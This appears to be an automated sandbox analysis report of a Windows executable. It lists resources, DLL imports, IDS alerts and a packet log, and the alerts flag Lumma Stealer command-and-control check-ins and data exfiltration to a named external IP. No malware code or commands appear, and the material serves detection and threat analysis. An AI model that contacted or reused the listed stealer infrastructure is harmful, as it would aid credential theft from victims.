                                                                                                                      RT_STRING0x29b7e00x82StarOffice Gallery theme p, 536899072 objects, 1st nEnglishUnited States0.7153846153846154
                                                                                                                      RT_STRING0x29b8680x2adataEnglishUnited States0.5476190476190477
                                                                                                                      RT_STRING0x29b8980x14adataEnglishUnited States0.5060606060606061
                                                                                                                      RT_STRING0x29b9e80x4e2dataEnglishUnited States0.376
                                                                                                                      RT_STRING0x29c2600x2a2dataEnglishUnited States0.28338278931750743
                                                                                                                      RT_STRING0x29bf800x2dcdataEnglishUnited States0.36885245901639346
                                                                                                                      RT_STRING0x29bed00xacdataEnglishUnited States0.45348837209302323
                                                                                                                      RT_STRING0x29cc380xdedataEnglishUnited States0.536036036036036
                                                                                                                      RT_STRING0x29c5080x4c4dataEnglishUnited States0.3221311475409836
                                                                                                                      RT_STRING0x29c9d00x264dataEnglishUnited States0.3741830065359477
                                                                                                                      RT_STRING0x29cd180x2cdataEnglishUnited States0.5227272727272727
                                                                                                                      RT_ACCELERATOR0x290f480x38dataEnglishUnited States0.875
                                                                                                                      RT_GROUP_CURSOR0x2995680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x2996b80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x2992c80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x2994180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x2998c00x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                      RT_GROUP_ICON0x2586600x3edataEnglishUnited States0.8225806451612904
                                                                                                                      RT_GROUP_ICON0x2603800x3edataEnglishUnited States0.8870967741935484
                                                                                                                      RT_VERSION0x297fb80x37cdataEnglishUnited States0.4439461883408072
                                                                                                                      RT_MANIFEST0x298fa80x1e7XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5503080082135524
                                                                                                                      None0x2987380x200dataEnglishUnited States0.482421875
                                                                                                                      None0x298b380x6adataEnglishUnited States0.7358490566037735
                                                                                                                      None0x2985380x200dataEnglishUnited States0.482421875
                                                                                                                      None0x2983380x200dataEnglishUnited States0.482421875
                                                                                                                      None0x2989380x200dataEnglishUnited States0.482421875
                                                                                                                      None0x298ba80x200dataEnglishUnited States0.482421875
                                                                                                                      None0x298da80x200dataEnglishUnited States0.482421875
                                                                                                                      None0x28ffe80x20dataEnglishUnited States1.1875
                                                                                                                      None0x2900080xadataEnglishUnited States1.6
                                                                                                                      DLLImport
                                                                                                                      KERNEL32.dllGetTimeZoneInformation, GetSystemTime, GetLocalTime, CreateThread, ExitThread, HeapSize, SetStdHandle, GetFileType, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetEnvironmentStrings, GetCommandLineW, GetCommandLineA, SetHandleCount, GetStdHandle, GetStartupInfoA, GetModuleFileNameA, GetEnvironmentVariableA, GetVersionExA, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, IsBadWritePtr, CompareStringA, CompareStringW, SetUnhandledExceptionFilter, GetCurrentDirectoryA, LCMapStringA, LCMapStringW, IsBadReadPtr, IsBadCodePtr, GetCPInfo, IsValidLocale, IsValidCodePage, GetLocaleInfoA, EnumSystemLocalesA, GetUserDefaultLCID, GetStringTypeA, HeapReAlloc, GetDriveTypeA, GetLocaleInfoW, GetACP, GetOEMCP, SetEnvironmentVariableA, GetLastError, CreateMutexW, lstrcmpW, FreeLibrary, GetProcAddress, LoadLibraryW, GetModuleHandleW, lstrcpynW, GetVersionExW, lstrlenW, Sleep, GlobalUnlock, GlobalLock, GlobalAlloc, DeleteFileW, MoveFileW, CopyFileW, LocalFree, FormatMessageW, GetShortPathNameW, GetFileAttributesExW, CreateDirectoryW, GetTempPathW, GetCurrentProcess, GetPrivateProfileStringW, CloseHandle, GetExitCodeProcess, WaitForSingleObject, CreateProcessW, TerminateProcess, FreeConsole, InterlockedExchange, GetProfileStringA, GlobalAddAtomA, FindResourceA, GetDriveTypeW, RaiseException, HeapAlloc, HeapFree, RtlUnwind, ExitProcess, GetStartupInfoW, SetErrorMode, FindResourceExW, GetCurrentDirectoryW, SystemTimeToFileTime, LocalFileTimeToFileTime, FindNextFileW, GetProfileIntW, GetThreadLocale, GetStringTypeExW, GetVolumeInformationW, FindFirstFileW, FindClose, UnlockFile, LockFile, DuplicateHandle, TlsGetValue, LocalReAlloc, TlsSetValue, GlobalReAlloc, TlsFree, GlobalHandle, TlsAlloc, LocalAlloc, GetProcessVersion, GlobalFlags, lstrcmpiW, FileTimeToLocalFileTime, FileTimeToSystemTime, lstrcmpA, lstrcmpiA, GetCurrentThread, GlobalGetAtomNameW, CreateEventW, SuspendThread, SetEvent, LoadLibraryA, FindResourceW, GetVersion, lstrcatW, GetCurrentThreadId, GlobalAddAtomW, GlobalFindAtomW, GlobalDeleteAtom, lstrcpyW, GetDiskFreeSpaceW, GetFileTime, SetFileTime, GetFullPathNameW, GetTempFileNameW, GetFileAttributesW, lstrlenA, InterlockedDecrement, InterlockedIncrement, MulDiv, GetModuleHandleA, SetLastError, SetFilePointer, SizeofResource, LoadResource, GenerateConsoleCtrlEvent, LockResource, GlobalSize, GetFileSize, SetCurrentDirectoryW, GlobalFree, FlushFileBuffers, WriteFile, ReadFile, SetFilePointerEx, SetEndOfFile, GetFileSizeEx, CreateFileW, AreFileApisANSI, SetFileAttributesW, WritePrivateProfileStringW, GetPrivateProfileIntW, GetWindowsDirectoryW, GetTickCount, GetModuleFileNameW, MultiByteToWideChar, WideCharToMultiByte, ResumeThread, TerminateThread, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, DeleteCriticalSection, SetThreadPriority, AttachConsole, GetStringTypeW
                                                                                                                      USER32.dllSetRectEmpty, wvsprintfW, EndDialog, CreateDialogIndirectParamW, GetActiveWindow, ValidateRect, WindowFromPoint, ShowWindow, MoveWindow, SetWindowTextW, IsDialogMessageW, IsDlgButtonChecked, SetDlgItemTextW, SetDlgItemInt, GetDlgItemInt, CheckDlgButton, SendDlgItemMessageW, SendDlgItemMessageA, MapWindowPoints, PeekMessageW, SetActiveWindow, AdjustWindowRectEx, EqualRect, DeferWindowPos, GetTopWindow, IsChild, WinHelpW, GetClassInfoW, RegisterClassW, TrackPopupMenu, GetDlgItem, GetWindowTextLengthW, GetWindowTextW, DestroyWindow, SetWindowsHookExW, CallNextHookEx, CallWindowProcW, DefWindowProcW, GetMessageTime, GetMessagePos, GetForegroundWindow, IntersectRect, SystemParametersInfoW, GetWindowPlacement, GetMenuCheckMarkDimensions, GetMenuState, ModifyMenuW, SetMenuItemBitmaps, EnableMenuItem, GetNextDlgTabItem, wsprintfW, UnhookWindowsHookEx, EndPaint, BeginPaint, GetWindowDC, MessageBoxW, LoadAcceleratorsW, SetPropW, SetClassLongW, SetMenu, HideCaret, ShowCaret, ExcludeUpdateRgn, GetWindowTextA, DrawTextA, GetClassInfoA, DefDlgProcA, DefWindowProcA, DestroyMenu, GetMessageW, TranslateMessage, DispatchMessageW, GetMenuStringW, FindWindowW, ExitWindowsEx, EmptyClipboard, SetClipboardData, GetClipboardData, CloseClipboard, OpenClipboard, DrawFocusRect, ReleaseDC, KillTimer, SetTimer, ScreenToClient, TranslateAcceleratorW, ReuseDDElParam, UnpackDDElParam, BringWindowToTop, IsZoomed, PostQuitMessage, ShowOwnedPopups, RegisterClipboardFormatW, GetAsyncKeyState, MapDialogRect, SetRect, LoadStringW, GetClassNameW, GetSysColorBrush, CharUpperW, IsWindowEnabled, SetFocus, RegisterWindowMessageW, GetDlgCtrlID, SetWindowPos, GetMenu, GetMenuItemCount, GetMenuItemID, GetWindowLongW, SetWindowLongW, DeleteMenu, GetKeyState, OffsetRect, InflateRect, GetSysColor, GetFocus, BeginDeferWindowPos, EndDeferWindowPos, GetCursorPos, ReleaseCapture, GetCapture, ClientToScreen, SetCursorPos, PtInRect, SetCursor, CharNextA, CallWindowProcA, RemovePropA, SetWindowsHookExA, GetWindowLongA, SendMessageA, IsWindowUnicode, GetClassNameA, SetWindowLongA, SetPropA, GetPropA, SetCapture, GrayStringW, DrawTextW, TabbedTextOutW, IsClipboardFormatAvailable, PostThreadMessageW, SetParent, LockWindowUpdate, RemovePropW, GetDCEx, GetParent, GetDesktopWindow, GetWindow, GetPropW, IsIconic, GetLastActivePopup, UpdateWindow, TrackPopupMenuEx, InvalidateRect, IsWindowVisible, GetSystemMenu, InsertMenuW, CheckMenuItem, DestroyIcon, LoadIconW, LoadImageW, GetDC, CopyRect, GetWindowRect, PostMessageW, IsWindow, LoadMenuW, GetClientRect, GetSubMenu, SetMenuDefaultItem, GetSystemMetrics, SendMessageW, SetForegroundWindow, EnableWindow, DestroyCursor, LoadBitmapW, LoadCursorW, GetWindowTextLengthA, UnregisterClassW, CreateWindowExW
                                                                                                                      GDI32.dllSetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, SelectClipRgn, ExcludeClipRect, IntersectClipRect, GetDeviceCaps, CreateSolidBrush, CreatePatternBrush, SetRectRgn, GetCharWidthW, CreateFontW, GetTextMetricsW, EnumFontFamiliesExW, CopyMetaFileW, CreateRectRgn, CombineRgn, SetTextColor, SetBkMode, SetBkColor, SaveDC, GetClipBox, CreateRectRgnIndirect, ExtSelectClipRgn, SetStretchBltMode, StretchDIBits, SetDIBitsToDevice, RestoreDC, CreateDIBSection, DeleteDC, PatBlt, DeleteObject, SelectObject, GetBkMode, GetTextExtentPoint32W, GetBkColor, GetTextColor, BitBlt, Escape, ExtTextOutW, TextOutW, RectVisible, PtVisible, CreateCompatibleBitmap, CreateCompatibleDC, CreateBitmap, GetStockObject, GetObjectW, ExtTextOutA, GetTextExtentPointA, CreateDIBitmap, CreateFontIndirectW
                                                                                                                      comdlg32.dllGetFileTitleW, GetSaveFileNameW, GetOpenFileNameW
                                                                                                                      WINSPOOL.DRVOpenPrinterW, DocumentPropertiesW, ClosePrinter
                                                                                                                      ADVAPI32.dllRegQueryValueW, RegSetValueExW, RegCreateKeyW, RegSetValueW, RegDeleteKeyW, RegEnumKeyW, RegOpenKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegQueryValueExW, RegCreateKeyExW, RegDeleteValueW, SetFileSecurityW, GetFileSecurityW, RegCloseKey
                                                                                                                      SHELL32.dllDragAcceptFiles, ShellExecuteW, DragQueryFileW, SHGetSpecialFolderPathW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetMalloc, SHGetDesktopFolder, SHFileOperationW, ExtractIconW, SHGetFileInfoW, DragFinish
                                                                                                                      COMCTL32.dllImageList_DragLeave, ImageList_DragEnter, ImageList_BeginDrag, ImageList_DragMove, ImageList_GetImageInfo, ImageList_Draw, ImageList_AddMasked, ImageList_EndDrag, _TrackMouseEvent, ImageList_SetBkColor, ImageList_Destroy, ImageList_Create, PropertySheetW, DestroyPropertySheetPage, CreatePropertySheetPageW, ImageList_DrawIndirect, ImageList_GetImageCount
                                                                                                                      oledlg.dllOleUIBusyW
                                                                                                                      ole32.dllCoTaskMemAlloc, RevokeDragDrop, OleDuplicateData, RegisterDragDrop, OleGetClipboard, ReleaseStgMedium, CoFreeUnusedLibraries, OleUninitialize, OleInitialize, CoInitialize, CoCreateInstance, CoUninitialize, CoCreateGuid, OleIsCurrentClipboard, CoRegisterMessageFilter, CoRevokeClassObject, CoLockObjectExternal, OleFlushClipboard
                                                                                                                      OLEAUT32.dllSysFreeString, SysAllocString, VariantClear, VarBstrFromDate
                                                                                                                      VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                      SHLWAPI.dllPathGetCharTypeW, PathIsRootW, PathRemoveFileSpecW, PathIsURLW, PathFindExtensionW, PathFileExistsW, PathIsDirectoryW, PathFindFileNameW
                                                                                                                      WINHTTP.dllWinHttpOpenRequest, WinHttpCrackUrl, WinHttpAddRequestHeaders, WinHttpReadData, WinHttpCloseHandle, WinHttpSendRequest, WinHttpSetOption, WinHttpQueryOption, WinHttpQueryHeaders, WinHttpOpen, WinHttpConnect, WinHttpReceiveResponse
                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                      EnglishUnited States

                                                                                                                      Download Network PCAP: filteredfull

                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2025-01-05T18:53:29.307820+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649769172.67.178.174443TCP
                                                                                                                      2025-01-05T18:53:30.081192+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649769172.67.178.174443TCP
                                                                                                                      2025-01-05T18:53:30.081192+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649769172.67.178.174443TCP
                                                                                                                      2025-01-05T18:53:31.283423+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649778172.67.178.174443TCP
                                                                                                                      2025-01-05T18:53:31.755774+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649778172.67.178.174443TCP
                                                                                                                      2025-01-05T18:53:31.755774+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649778172.67.178.174443TCP
                                                                                                                      2025-01-05T18:53:32.557598+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649788172.67.178.174443TCP
                                                                                                                      2025-01-05T18:53:33.713035+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649799172.67.178.174443TCP
                                                                                                                      2025-01-05T18:53:41.657467+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649799172.67.178.174443TCP
                                                                                                                      2025-01-05T18:53:42.312298+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649851172.67.178.174443TCP
                                                                                                                      2025-01-05T18:53:44.138158+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649864172.67.178.174443TCP
                                                                                                                      2025-01-05T18:53:45.448469+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649875172.67.178.174443TCP
                                                                                                                      2025-01-05T18:53:46.922776+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649884172.67.178.174443TCP
                                                                                                                      2025-01-05T18:53:48.713395+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649900172.67.178.174443TCP
                                                                                                                      • Total Packets: 103
                                                                                                                      • 443 (HTTPS)
                                                                                                                      • 53 (DNS)
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Jan 5, 2025 18:53:28.786752939 CET49769443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:28.786781073 CET44349769172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:28.786858082 CET49769443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:28.808841944 CET49769443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:28.808852911 CET44349769172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:29.307744980 CET44349769172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:29.307820082 CET49769443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:29.309631109 CET49769443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:29.309636116 CET44349769172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:29.309874058 CET44349769172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:29.354051113 CET49769443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:29.359679937 CET49769443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:29.359699011 CET49769443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:29.359744072 CET44349769172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:30.081199884 CET44349769172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:30.081989050 CET44349769172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:30.082048893 CET49769443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:30.083355904 CET49769443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:30.083368063 CET44349769172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:30.083399057 CET49769443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:30.083405972 CET44349769172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:30.094223976 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:30.094239950 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:30.094312906 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:30.094597101 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:30.094607115 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.283354998 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.283422947 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.284841061 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.284852028 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.285111904 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.286304951 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.286338091 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.286364079 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.755801916 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.755846977 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.755884886 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.755918980 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.755978107 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.756000996 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.756014109 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.756598949 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.756640911 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.756671906 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.756696939 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.756788015 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.756794930 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.756844044 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.761960030 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.807143927 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.807148933 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.842551947 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.842587948 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.842601061 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.842607975 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.842639923 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.842658997 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.842664003 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.842705965 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.878729105 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.878812075 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.878870964 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.888444901 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.888454914 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:31.888465881 CET49778443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:31.888470888 CET44349778172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:32.102076054 CET49788443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:32.102127075 CET44349788172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:32.102205992 CET49788443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:32.102744102 CET49788443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:32.102761030 CET44349788172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:32.557522058 CET44349788172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:32.557598114 CET49788443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:32.559283972 CET49788443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:32.559299946 CET44349788172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:32.559528112 CET44349788172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:32.561142921 CET49788443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:32.561418056 CET49788443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:32.561450958 CET44349788172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:33.105984926 CET44349788172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:33.106070995 CET44349788172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:33.106149912 CET49788443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:33.106285095 CET49788443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:33.106303930 CET44349788172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:33.242950916 CET49799443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:33.242978096 CET44349799172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:33.243058920 CET49799443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:33.243520975 CET49799443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:33.243534088 CET44349799172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:33.712960005 CET44349799172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:33.713035107 CET49799443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:33.714747906 CET49799443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:33.714752913 CET44349799172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:33.714946985 CET44349799172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:33.716492891 CET49799443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:33.716646910 CET49799443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:33.716672897 CET44349799172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:33.716720104 CET49799443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:33.759330034 CET44349799172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:41.657480001 CET44349799172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:41.657557964 CET44349799172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:41.657618046 CET49799443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:41.657891035 CET49799443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:41.657906055 CET44349799172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:41.837721109 CET49851443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:41.837769032 CET44349851172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:41.837846041 CET49851443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:41.838231087 CET49851443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:41.838248968 CET44349851172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:42.312220097 CET44349851172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:42.312298059 CET49851443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:42.313644886 CET49851443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:42.313652992 CET44349851172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:42.313921928 CET44349851172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:42.315162897 CET49851443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:42.315337896 CET49851443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:42.315371037 CET44349851172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:42.315438032 CET49851443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:42.315444946 CET44349851172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:42.911799908 CET44349851172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:42.911897898 CET44349851172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:42.911941051 CET49851443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:42.915333033 CET49851443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:42.915354013 CET44349851172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:43.657958984 CET49864443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:43.657991886 CET44349864172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:43.658058882 CET49864443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:43.658452988 CET49864443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:43.658464909 CET44349864172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:44.138065100 CET44349864172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:44.138158083 CET49864443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:44.139529943 CET49864443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:44.139535904 CET44349864172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:44.139766932 CET44349864172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:44.143225908 CET49864443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:44.143354893 CET49864443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:44.143374920 CET44349864172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:44.867696047 CET44349864172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:44.867784023 CET44349864172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:44.867855072 CET49864443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:44.868066072 CET49864443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:44.868081093 CET44349864172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:44.979696035 CET49875443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:44.979728937 CET44349875172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:44.979794025 CET49875443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:44.980161905 CET49875443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:44.980174065 CET44349875172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:45.448398113 CET44349875172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:45.448468924 CET49875443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:45.449928999 CET49875443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:45.449939966 CET44349875172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:45.450176954 CET44349875172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:45.451491117 CET49875443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:45.451577902 CET49875443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:45.451582909 CET44349875172.67.178.174192.168.2.6
